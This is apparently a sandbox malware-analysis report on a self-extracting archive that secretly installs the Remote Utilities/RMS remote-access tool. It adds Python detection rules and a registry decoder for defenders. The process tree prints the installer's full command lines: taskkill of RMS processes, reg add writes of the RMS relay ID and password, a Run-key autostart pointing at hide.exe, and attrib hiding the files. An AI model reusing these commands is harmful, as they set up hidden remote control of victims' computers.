Analysis
- max time kernel: 151s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 27-11-2022 22:17
Behavioral task: behavioral1
- Sample: 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe
- Resource: win7-20221111-en
(The signatures and memory dumps on this page are labelled behavioral2 and come from the windows10-2004_x64 / win10v2004-20220901-en run described in the header, not from this win7 task.)
General
- Target: 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe
- Size: 4.0MB
- MD5: c613714d39e2b2bcb8c5d7a6036145ef
- SHA1: 3eef6909f3f8367cc8336f7af00704cf662d6546
- SHA256: 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e
- SHA512: af61bf7d26f2ed448042f56ce9d597e1289a535c4266ef713b0bc348467a602ec06dbc25b494dd056eacee22567687fce1417d1dc22ec27ada46009f818569cf
- SSDEEP: 98304:MeRrH4bOQgJ0PT+kab/bjoecLdvetq0WoNVs/7eiKo8:MeRrHLxJiT+kaLZostq0WoNweiKo8
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes:
    PID 3664 svchost.exe created PID 3380 rutserv.exe
  The svchost.exe instance is the one started with -s seclogon, i.e. the Secondary Logon service (the RunAs / CreateProcessWithLogonW path). Secondary Logon creates the requested process with the parent set to the caller rather than to itself, which is why rutserv.exe (PID 3380) sits under hide.exe in the process tree although seclogon's svchost.exe did the creating.
- Executes dropped EXE (4 IoCs)
  Processes:
    PID 2224 hide.exe
    PID 3380 rutserv.exe
    PID 1236 rutserv.exe
    PID 3748 rfusclient.exe
- Sets file to hidden (1 TTPs, 1 IoC)
  Modifies file attributes to stop it showing in Explorer etc.
- YARA rule match: upx (UPX packer signature)
  Resources (the submitted sample is PID 3248, the dropped hide.exe is PID 2224):
    behavioral2/memory/3248-132-0x0000000000400000-0x000000000042A000-memory.dmp
    C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe (listed twice on the page)
    behavioral2/memory/3248-158-0x0000000000400000-0x000000000042A000-memory.dmp
    behavioral2/memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmp
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    Key value queried: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation by 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
    Key created: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run (reg.exe)
    Set value (str): \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uac = "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" (reg.exe)
- AutoIT Executable (1 IoC)
  AutoIT scripts compiled to PE executables.
  Resources:
    behavioral2/memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmp, yara_rule autoit_exe (PID 2224 is hide.exe, so the dropped launcher is a compiled AutoIt script)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature reads "likely ransomware behaviour"; no process IoC is attached to it on this page, and the dropped components (rutserv.exe, rfusclient.exe and the TektonIT\Remote Manipulator System registry parameters) are the Remote Utilities / RMS remote-access tool, not ransomware.
- Kills process with taskkill (2 IoCs)
  Processes:
    PID 3932 taskkill.exe
    PID 1332 taskkill.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes:
    PID 3380 rutserv.exe (4 entries)
    PID 1236 rutserv.exe (2 entries)
- Suspicious use of AdjustPrivilegeToken (8 IoCs)
  Processes:
    SeDebugPrivilege: PID 3932 taskkill.exe
    SeDebugPrivilege: PID 1332 taskkill.exe
    SeDebugPrivilege: PID 3380 rutserv.exe
    SeTcbPrivilege: PID 3664 svchost.exe (2 entries)
    SeTakeOwnershipPrivilege: PID 1236 rutserv.exe
    SeTcbPrivilege: PID 1236 rutserv.exe (2 entries)
- Suspicious use of FindShellTrayWindow (3 IoCs)
  Processes:
    PID 2224 hide.exe (3 entries)
- Suspicious use of SendNotifyMessage (3 IoCs)
  Processes:
    PID 2224 hide.exe (3 entries)
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    PID 3380 rutserv.exe
    PID 1236 rutserv.exe
- Suspicious use of WriteProcessMemory (54 IoCs)
  Processes (source PID wrote to target PID; the sandbox records each process creation as three writes, so every pair below appears three times on the page):
    PID 3248 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe -> PID 444 cmd.exe
    PID 444 cmd.exe -> PID 3932 taskkill.exe
    PID 444 cmd.exe -> PID 1332 taskkill.exe
    PID 444 cmd.exe -> PID 5108 reg.exe
    PID 444 cmd.exe -> PID 4360 reg.exe
    PID 444 cmd.exe -> PID 4992 reg.exe
    PID 444 cmd.exe -> PID 4068 reg.exe
    PID 444 cmd.exe -> PID 308 reg.exe
    PID 444 cmd.exe -> PID 4652 reg.exe
    PID 444 cmd.exe -> PID 3464 reg.exe
    PID 444 cmd.exe -> PID 3836 reg.exe
    PID 444 cmd.exe -> PID 2228 reg.exe
    PID 444 cmd.exe -> PID 2224 hide.exe
    PID 444 cmd.exe -> PID 4716 attrib.exe
    PID 3248 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe -> PID 1212 cmd.exe
    PID 2224 hide.exe -> PID 3380 rutserv.exe
    PID 3664 svchost.exe -> PID 1236 rutserv.exe
    PID 1236 rutserv.exe -> PID 3748 rfusclient.exe
- Views/modifies file attributes (1 TTPs, 1 IoC)
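The signatures above describe the chain install.cmd runs: kill any running RMS host, write the TektonIT parameters with reg.exe, point a Run value at hide.exe, start the host from the user profile and hide the files with attrib. The following is an added example, not part of the sandbox report and not code from the Remote Utilities / RMS product: Python detection logic run over constructed process-creation records that mirror the command lines in the process tree. The field names Image, ParentImage and CommandLine are an assumption about the telemetry (Sysmon-style), and the Program Files path used for the benign control record at the end is assumed, not taken from the page.

```python
import re
from collections import defaultdict

# Constructed process-creation records mirroring the command lines in the
# process tree (field names are an assumption about the telemetry). The
# last record is a constructed benign host install under Program Files
# (assumed path) to show what the rules must not flag.
CMD = r"C:\Windows\SysWOW64\cmd.exe"
APPDATA_MS = r"C:\Users\Admin\AppData\Roaming\Microsoft"
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\taskkill.exe", "ParentImage": CMD,
     "CommandLine": "taskkill /f /im rutserv.exe"},
    {"Image": r"C:\Windows\SysWOW64\reg.exe", "ParentImage": CMD,
     "CommandLine": r'REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" '
                    r'/f /v "FUSClientPath" /t REG_SZ /d "' + APPDATA_MS + r'\rfusclient.exe"'},
    {"Image": r"C:\Windows\SysWOW64\reg.exe", "ParentImage": CMD,
     "CommandLine": r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" '
                    r'/f /v "uac" /t REG_SZ /d "' + APPDATA_MS + r'\hide.exe"'},
    {"Image": APPDATA_MS + r"\rutserv.exe", "ParentImage": APPDATA_MS + r"\hide.exe",
     "CommandLine": "rutserv.exe"},
    {"Image": APPDATA_MS + r"\rfusclient.exe", "ParentImage": APPDATA_MS + r"\rutserv.exe",
     "CommandLine": APPDATA_MS + r"\rfusclient.exe /tray /user"},
    {"Image": r"C:\Windows\SysWOW64\attrib.exe", "ParentImage": CMD,
     "CommandLine": 'attrib +s +h +r "' + APPDATA_MS + r'\*.*"'},
    # constructed benign control (install path is an assumption)
    {"Image": r"C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r'"C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe"'},
]

RMS_BINARIES = {"rutserv.exe", "rfusclient.exe"}
# Locations a legitimately installed host binary is expected to run from.
TRUSTED_ROOTS = re.compile(r"^[a-z]:\\(program files( \(x86\))?|windows)\\", re.I)


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rules_for(ev):
    """Return the names of every rule a single process-creation record trips."""
    img, cl = _base(ev["Image"]), ev["CommandLine"].lower()
    hits = []
    # 1. RMS parameters written straight into the registry by reg.exe
    if img == "reg.exe" and r"tektonit\remote manipulator system" in cl:
        hits.append("rms_config_written_with_reg")
    # 2. Run-key persistence whose target lives in the user profile
    if img == "reg.exe" and r"\currentversion\run" in cl \
            and re.search(r"\\appdata\\(roaming|local)\\", cl):
        hits.append("run_key_points_to_appdata")
    # 3. RMS binaries executing outside Program Files / Windows
    if img in RMS_BINARIES and not TRUSTED_ROOTS.match(ev["Image"]):
        hits.append("rms_binary_outside_program_files")
    # 4. attrib hiding a profile directory (+s +h marks files as protected system files)
    if img == "attrib.exe" and "+h" in cl and "+s" in cl and "\\appdata\\" in cl:
        hits.append("attrib_hides_appdata_files")
    # 5. taskkill against the RMS host: the installer is replacing a running copy
    if img == "taskkill.exe" and re.search(r"/im\s+(rutserv|rfusclient)\.exe", cl):
        hits.append("taskkill_targets_rms")
    return hits


def scan(events):
    """Group tripped rules with the command lines that tripped them."""
    findings = defaultdict(list)
    for ev in events:
        for rule in rules_for(ev):
            findings[rule].append(ev["CommandLine"])
    return dict(findings)


if __name__ == "__main__":
    for rule, lines in scan(EVENTS).items():
        print(rule)
        for line in lines:
            print("   ", line)
```

Rule 3 is the one that carries most of the weight on a host that legitimately uses Remote Utilities: the binaries are signed vendor software, so image name and hash are useless, but a host running from %APPDATA%\Microsoft with its parameters set by reg.exe from cmd.exe is not how the product installs itself. Adjust TRUSTED_ROOTS to the install root your organisation actually uses before deploying.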
Processes
- C:\Users\Admin\AppData\Local\Temp\9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe (PID 3248)
  command line: "C:\Users\Admin\AppData\Local\Temp\9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe"
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 444)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Microsoft\install.cmd" "
    signatures: Suspicious use of WriteProcessMemory
    (The sample is 32-bit, so its reference to system32\cmd.exe is redirected to SysWOW64; the same applies to the taskkill.exe, reg.exe and attrib.exe children below.)
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im rutserv.exe
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im rfusclient.exe
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\reg.exe
      command line: REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Options" /t REG_BINARY /d [binary data not shown on the page]
    - C:\Windows\SysWOW64\reg.exe
      command line: REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003500310035002d003100330037002d003900320034003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e0074007200750065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
      (On the page a "3" is fused onto the end of this data; it is the tree's depth marker, not part of the value.)
      decoded (UTF-16LE with BOM): <?xml version="1.0" encoding="UTF-16LE"?> <rms_internet_id_settings version="60004"><internet_id>515-137-924</internet_id><use_inet_connection>true</use_inet_connection><inet_server></inet_server><use_custom_inet_server>false</use_custom_inet_server><inet_id_port>5655</inet_id_port><use_inet_id_ipv6>false</use_inet_id_ipv6></rms_internet_id_settings>
      Internet-ID is Remote Utilities' relayed connection mode: with use_custom_inet_server=false the host registers outbound with the vendor's public relay under ID 515-137-924 on port 5655, so the operator needs no inbound port on the victim. The Internet-ID is the most useful pivot in this report.
    - C:\Windows\SysWOW64\reg.exe
      command line: REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034
      (The trailing "3" on the page is again the depth marker.)
      decoded (UTF-16LE, no BOM): 89DCAFC5FB9EDB8A8704536933577408D17A65964938F3A45486270117FB639A75CC19D6F4800F0727976B70CBA8477949046E3464650CCEAAE89FAC0597F924, i.e. 128 hex characters encoding a 64-byte stored value. The plaintext access password is not recoverable from the page.
    - C:\Windows\SysWOW64\reg.exe
      command line: REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CallbackSettings" /t REG_BINARY /d fffe
      decoded: empty string (a UTF-16 byte-order mark and nothing else)
    - C:\Windows\SysWOW64\reg.exe
      command line: REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "notification" /t REG_BINARY /d [binary data not shown on the page]
    - C:\Windows\SysWOW64\reg.exe
      command line: REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe"
    - C:\Windows\SysWOW64\reg.exe
      command line: REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d [binary data not shown on the page]
    - C:\Windows\SysWOW64\reg.exe
      command line: reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v uac2 /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" /f
      (The autostart values Windows reads from this key are Load and Run; a value named uac2 is not acted on, so this write is not itself a persistence mechanism.)
    - C:\Windows\SysWOW64\reg.exe
      command line: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "uac" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe"
      signatures: Adds Run key to start application
    - C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe (PID 2224)
      command line: "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe"
      signatures: Executes dropped EXE; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe (PID 3380)
        command line: rutserv.exe
        signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
        - C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe (PID 1236)
          command line: C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second
          signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe (PID 3748)
            command line: C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user
            signatures: Executes dropped EXE
    - C:\Windows\SysWOW64\attrib.exe (PID 4716)
      command line: attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Microsoft\*.*"
      signatures: Sets file to hidden; Views/modifies file attributes
  - C:\Windows\SysWOW64\cmd.exe (PID 1212)
    command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
    (7ZSfx000.cmd is the post-extraction script written by a 7-Zip SFX module, so the 4.0MB sample is a self-extracting archive that unpacks the RMS files into C:\Users\Admin\AppData\Roaming\Microsoft and then runs install.cmd.)
- C:\Windows\system32\svchost.exe (PID 3664)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  (Secondary Logon service; it is the actual creator of rutserv.exe PID 3380 and wrote to rutserv.exe PID 1236, see the signatures above.)
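The REG_BINARY values install.cmd writes are UTF-16 text, so the interesting parts of the configuration can be read straight off the command lines. The following is an added example, not part of the sandbox report and not code from the Remote Utilities / RMS product: a decoder that takes the InternetId, Password, CallbackSettings and uac2 command lines from the tree above (hex copied verbatim, minus the depth marker fused onto it on the page), parses the reg add syntax, decodes the blobs and returns the Internet-ID, relay port and the size of the stored password value. The function names and the dictionary layout are this editor's choices.

```python
import json
import re
import xml.etree.ElementTree as ET

# Command lines transcribed from the process tree above. The "3" fused onto
# each binary blob on the page is the tree's depth marker and is left out.
RMS_KEY = r"HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters"
INTERNET_ID_CMD = (
    f'REG ADD "{RMS_KEY}" /f /v "InternetId" /t REG_BINARY /d '
    "fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a00"
    "3c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e00"
    "3c0069006e007400650072006e00650074005f00690064003e003500310035002d003100330037002d003900320034003c002f0069006e007400650072006e00650074005f00690064003e00"
    "3c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e0074007200750065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00"
    "3c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e00"
    "3c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00"
    "3c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e00"
    "3c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e00"
    "3c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00"
)
PASSWORD_CMD = (
    f'REG ADD "{RMS_KEY}" /f /v "Password" /t REG_BINARY /d '
    "3800390044004300410046004300350046004200390045004400420038004100"
    "3800370030003400350033003600390033003300350037003700340030003800"
    "4400310037004100360035003900360034003900330038004600330041003400"
    "3500340038003600320037003000310031003700460042003600330039004100"
    "3700350043004300310039004400360046003400380030003000460030003700"
    "3200370039003700360042003700300043004200410038003400370037003900"
    "3400390030003400360045003300340036003400360035003000430043004500"
    "4100410045003800390046004100430030003500390037004600390032003400"
)
CALLBACK_CMD = f'REG ADD "{RMS_KEY}" /f /v "CallbackSettings" /t REG_BINARY /d fffe'
UAC2_CMD = (r'reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" '
            r'/v uac2 /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" /f')


def parse_reg_add(cmdline):
    """Split a 'reg add' command line into key / value name / type / data.
    Handles both flag orders seen in the tree ('/f /v X /t T /d D' and
    '/v X /t T /d "D" /f'); value names and data may be quoted or bare."""
    key = re.match(r'\s*reg\s+add\s+"([^"]+)"', cmdline, re.I)
    name = re.search(r'/v\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    vtype = re.search(r'/t\s+(\S+)', cmdline, re.I)
    data = re.search(r'/d\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    if not (key and name and vtype and data):
        raise ValueError("not a reg add command line: %r" % cmdline[:60])
    return {
        "key": key.group(1),
        "name": name.group(1) or name.group(2),
        "type": vtype.group(1).upper(),
        "data": data.group(2) if data.group(1) is None else data.group(1),
    }


def reg_binary_text(hexdata):
    """RMS stores these parameters as UTF-16LE text; the XML ones carry a
    BOM (ff fe), the Password value does not. A blob that is only the BOM,
    like CallbackSettings here, decodes to an empty string."""
    raw = bytes.fromhex(hexdata)
    if len(raw) % 2:
        raise ValueError("odd byte count, not UTF-16")
    return raw.decode("utf-16") if raw[:2] == b"\xff\xfe" else raw.decode("utf-16-le")


def parse_rms_xml(text):
    """Flatten a decoded RMS settings document into {element: text}."""
    body = re.sub(r"^<\?xml[^>]*\?>\s*", "", text)  # encoding already handled above
    root = ET.fromstring(body)
    out = {"root": root.tag, "version": root.get("version")}
    out.update({child.tag: (child.text or "") for child in root})
    return out


def decode_rms_parameters(cmdlines):
    """Decode every reg add line into something a responder can read."""
    out = {}
    for line in cmdlines:
        v = parse_reg_add(line)
        if v["type"] != "REG_BINARY":
            out[v["name"]] = v["data"]
            continue
        text = reg_binary_text(v["data"])
        if text.startswith("<?xml"):
            out[v["name"]] = parse_rms_xml(text)
        elif text and re.fullmatch(r"[0-9A-Fa-f]+", text) and len(text) % 2 == 0:
            # hex digits stored as text: a fixed-size digest, not the plaintext password
            out[v["name"]] = {"digest_bytes": len(text) // 2, "hex": text}
        else:
            out[v["name"]] = text
    return out


if __name__ == "__main__":
    print(json.dumps(decode_rms_parameters(
        [INTERNET_ID_CMD, PASSWORD_CMD, CALLBACK_CMD, UAC2_CMD]), indent=2))
```

The same decoder works on the bytes read back from a live hive (reg query, or the registry module of a forensic toolkit), since the on-disk value is exactly what reg.exe was handed on the command line; the Internet-ID it returns is what to search for across other hosts' TektonIT keys.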
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
  Filesize: 300B
  MD5: 37fb6f29c7eadc5015cc1d3de40bda6c
  SHA1: 559517b0545c2d57d85a62cddb5a9c156ac5d808
  SHA256: 885bd0a9ca439ab47b456243a7feddb40b6900eb7fe591dad018fb46d89d64f9
  SHA512: a0c7f7cde083096b154441a0f4197e7162203a52a65e00ded63108a76197ce86efcfb6d986ce5c9e954eefb967af358b9969dabea082fe967d2bdac8162a0af0
- C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe (listed twice on the page with identical hashes)
  Filesize: 366KB
  MD5: 625853e2048849b0ecd47bd6cfd6a705
  SHA1: a9382760732e95d9be675b5494a1a29f55853a73
  SHA256: 53c22abdc57b3d91d474b29ea98a7ad79eb991591b697aa8c2b1214548bd62f8
  SHA512: 713f96a69569d1ed6f794772c0ccd314ef16429c48b13c63f9560c08d8ac57ea73c3ead0677c8886dcc86e55f19d72d2b116ecfa0766aaabe6e6d78db42c81fb
- C:\Users\Admin\AppData\Roaming\Microsoft\install.cmd
  Filesize: 10KB
  MD5: 294c12aea77808afd52e3e355831eaf3
  SHA1: f152d3ccfa5b9ed27c158ba98990da6ac238238d
  SHA256: fd27eafba3d87daf5251e707631322812d24a9b03c72ad0262ab8fc3d8308fc4
  SHA512: ddd8ce6efa46d27d7374403b0ba6f6405d2cfc9c47c2e9d3c22c62d1c227ea989d11c0232ac19fbab83f765d5f641b784ae30c43398e5fc56ab0c5fb8fe9ddce
- C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe (listed twice on the page with identical hashes)
  Filesize: 1.3MB
  MD5: 314f4d76a82e024a1c0facb46f0dbc0a
  SHA1: c8437c555755302a47229cdc18b58d0ee961d00f
  SHA256: 9c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
  SHA512: b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
- C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe (listed three times on the page with identical hashes)
  Filesize: 6.1MB
  MD5: 75c2572ab3afad8f4f462c3221be14f4
  SHA1: 8429b630a9113fa1d07b27cc494429adb7f77aa0
  SHA256: f6a8e096046e1f541cff82d063e941bb2b2849944403e25295703cce0dbb0c92
  SHA512: 03f5d58cb589e9c501d935e11c16cffc2b35f3c5b9e8cc35c7ed16d333251377d0ecd741265a052963c978d837aae4d4891c80fb7de4b30b0e22007431094cf9
- C:\Users\Admin\AppData\Roaming\Microsoft\vp8decoder.dll
  Filesize: 127KB
  MD5: bda3c03c3e5d65922a311009e0ae8cd6
  SHA1: 37093c457ac5f01649b4d23a3d075a531af08baa
  SHA256: 30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
  SHA512: eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
- C:\Users\Admin\AppData\Roaming\Microsoft\vp8encoder.dll
  Filesize: 238KB
  MD5: 200cba4b9cbdd64f1a281b89cd1467f3
  SHA1: fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
  SHA256: c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
  SHA512: 15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3
- C:\Users\Admin\AppData\Roaming\Microsoft\webmmux.dll
  Filesize: 90KB
  MD5: aa78ed008f72533c7136bf6d4bddb0d0
  SHA1: 2e9abd74e615adc99f561cbdbe6067dfd81a406a
  SHA256: 41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
  SHA512: e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021
- C:\Users\Admin\AppData\Roaming\Microsoft\webmvorbisdecoder.dll
  Filesize: 141KB
  MD5: 0867a260483876336a727cf9f2928b13
  SHA1: 3c8c59bfba6ed2aeef35c0d1fc4689683df1e660
  SHA256: cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
  SHA512: b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f
- C:\Users\Admin\AppData\Roaming\Microsoft\webmvorbisencoder.dll
  Filesize: 202KB
  MD5: 43adc4acd56c56b0a25664954c7aa80c
  SHA1: d9085625b4a39b3969db8047ad3224b3fc9f60fc
  SHA256: 0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
  SHA512: 346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515
- memory/308-141-0x0000000000000000-mapping.dmp
- memory/444-133-0x0000000000000000-mapping.dmp
- memory/1212-157-0x0000000000000000-mapping.dmp
- memory/1236-163-0x0000000000000000-mapping.dmp
- memory/1332-136-0x0000000000000000-mapping.dmp
- memory/2224-147-0x0000000000000000-mapping.dmp
- memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmp (Filesize: 932KB)
- memory/2228-145-0x0000000000000000-mapping.dmp
- memory/3248-132-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/3248-158-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/3380-160-0x0000000000000000-mapping.dmp
- memory/3464-143-0x0000000000000000-mapping.dmp
- memory/3748-165-0x0000000000000000-mapping.dmp
- memory/3748-167-0x0000000000400000-0x00000000009AE000-memory.dmp (Filesize: 5.7MB)
- memory/3748-168-0x0000000000400000-0x00000000009AE000-memory.dmp (Filesize: 5.7MB)
- memory/3836-144-0x0000000000000000-mapping.dmp
- memory/3932-135-0x0000000000000000-mapping.dmp
- memory/4068-140-0x0000000000000000-mapping.dmp
- memory/4360-138-0x0000000000000000-mapping.dmp
- memory/4652-142-0x0000000000000000-mapping.dmp
- memory/4716-149-0x0000000000000000-mapping.dmp
- memory/4992-139-0x0000000000000000-mapping.dmp
- memory/5108-137-0x0000000000000000-mapping.dmp